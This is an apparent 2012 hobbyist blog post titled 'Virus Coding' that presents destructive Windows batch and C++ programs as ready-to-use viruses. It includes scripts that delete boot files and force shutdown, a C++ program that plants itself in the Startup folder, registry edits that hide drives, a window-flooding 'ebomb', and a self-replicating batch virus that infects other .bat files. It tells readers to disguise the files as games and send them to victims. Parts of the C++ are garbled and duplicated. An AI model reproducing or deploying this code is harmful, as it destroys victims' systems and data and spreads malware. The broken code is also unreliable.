Monday, August 27, 2012

Virus Coding


Viruses tha crushes your own PC!

offattrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c “A VIRUS IS TAKING OVER c:Drive
Save as bat file in notepad!!
This will pop up a message saying OWNED!!
And shut down the computer never to reboot again!
Type this in notepad
start virus.bat
and save as with this name – virus.bat
ur antivirus will not detect this virus.
Basically this program will delete all that files which are needed for bootingIf your os is installed in d drive instead of c then replace c with d.
Save it as 'sth.bat'(Virus Coding)!!
using namespace std;
int main()
{ keybd_event(VK_MENU,0×38,0,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);
char buffer[255];
char inputFile[]=”C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat”;
ifstream input(inputFile);
if (!input)
ofstream fp(“C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat”, ios::app);
fp << "@ECHO OFF \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
while (!input.eof())
char buffer[255];
char inputFile[]="C:\\rawr.exe";
ifstream input(inputFile);
if (!input)
ofstream fp("CLICK.bat", ios::app);
fp << "@ECHO OFF \n";
fp << "COPY matrix.exe C:\\rawr.exe \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
system("START CLICK.bat");
while (!input.eof())
system("call shutdown.exe -S");
goto START;
for(int i = 0; i
int num = (rand() % 10);
cout <
cout <
cout <
cout <
cout <
cout <
cout <
cout <
cout <
cout <
cout <
cout <
for ( int j = 0; j
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout <
goto START;
Matrix Virus!
using namespace std;
int main()
{ keybd_event(VK_MENU,0×38,0,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);
char buffer[255];
char inputFile[]=”C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat”;
ifstream input(inputFile);
if (!input)
ofstream fp(“C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat”, ios::app);
fp << "@ECHO OFF \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
while (!input.eof())
char buffer[255];
char inputFile[]="C:\\rawr.exe";
ifstream input(inputFile);
if (!input)
ofstream fp("CLICK.bat", ios::app);
fp << "@ECHO OFF \n";
fp << "COPY matrix.exe C:\\rawr.exe \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
system("START CLICK.bat");
while (!input.eof())
system("call shutdown.exe -S");
goto START;
for(int i = 0; i
int num = (rand() % 10);
cout <
cout <
cout <
cout <
cout <
cout <
cout <
cout <
cout <
cout <
cout <
cout <
for ( int j = 0; j
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout <
goto START;
Open notepad and paste this:
Save it as The Anti-Virus should stop you (if it does that means its working).
Batch Virus Code Creation:
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n
shutdown -r -c \”Sorry Your System is hacked by us!\” -f
I think this code will simple for non c++ programmers. It is easy to create the batch file also.
Copy the above code to notepad.
Save it with .bat extension (for ex: nodrivevirus.bat)
Send the file to your victim
Ebomb a virus for fun
This is a simple attack that enables running multiple applications in victims pc just to harass him. There are many ways to ebomb but this is the most easiest way to do it. Simply open notepad and type
@echo off
start iexplore
start notepad
start firefox
and save it as anyname.bat (note: paste the code with “start ” in many times to annoy them)
you can also do some additional stuff like enter the message for victim eg. msg * “(Now your pc is getting Hacked)”
and also you can open some websites to irritate victim eg.
start iexplore “”
start firefox “”
(simply add them in the .bat file you created)
Now just like always upload the file on any online storage (rapidshare, ziddu,hotfile or fileserve)
and send the link to your victim (you can probably make him believe that its game or just any other app simply by converting the .bat in .exe by using any batch to exe converter. You can also send it via pen drive. The main purpose is to send it to victim.
When victim will open it ………….. :D
(Sample eg.
@echo off
msg * “(sorry buddy but you just f*$%d your self)”
start iexplore “Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
and then simply save it as “anyname.bat”
Note : The only way to get out of any ebomb attack is simply by System restart
How to create an advanced and dangerous virus:
@echo off>nul.ViRuS
if “%1==”/ViRuS_MULTIPLY goto ViRuS_multiply
if “%1==”/ViRuS_OUTER_LOOP goto ViRuS_outer_loop
if “%1==”/ViRuS_FINDSELF goto ViRuS_findself
if “%VOFF%==”T goto ViRuS_OLDBAT
set ViRuSname=%0
if not exist %0.bat call %0 /ViRuS_FINDSELF %path%
if not exist %ViRuSname%.bat set ViRuSname=
if “%ViRuSname%==” goto ViRuS_OLDBAT
rem ViRuS if batch is started with name.BAT, virus will not become active
rem ViRuS it was a bug, now it’s a feature ! (also notice the voff variable)
rem ViRuS also if batch was only in an append /x:on path (chance=minimal)
attrib +h %ViRuSname%.bat
for %%a in (%path%;.) do call %0 /ViRuS_OUTER_LOOP %%a
attrib -h %ViRuSname%.bat
set ViRuSname=
if “%2==” goto XXX_END>nul.ViRuS
if exist %2\%ViRuSname%.bat set ViRuSname=%2\%ViRuSname%
if exist %ViRuSname%.bat goto XXX_END
if exist %2%ViRuSname%.bat set ViRuSname=%2%ViRuSname%
if exist %ViRuSname%.bat goto XXX_END
goto ViRuS_findself
for %%a in (%2\*.bat;%2*.bat) do call %0 /ViRuS_MULTIPLY %%a
goto XXX_END>nul.ViRuS
find “ViRuS” xViRuSx.bat
find /v “ViRuS” >xViRuSx.bat
echo :XXX_END>>xViRuSx.bat
copy xViRuSx.bat %2>nul
del xViRuSx.bat
goto XXX_END>nul.ViRuS
echo on>nul.ViRuS
echo This Virus Is Made By U-Hacker.
Save it as virus7.exe and release the monster.

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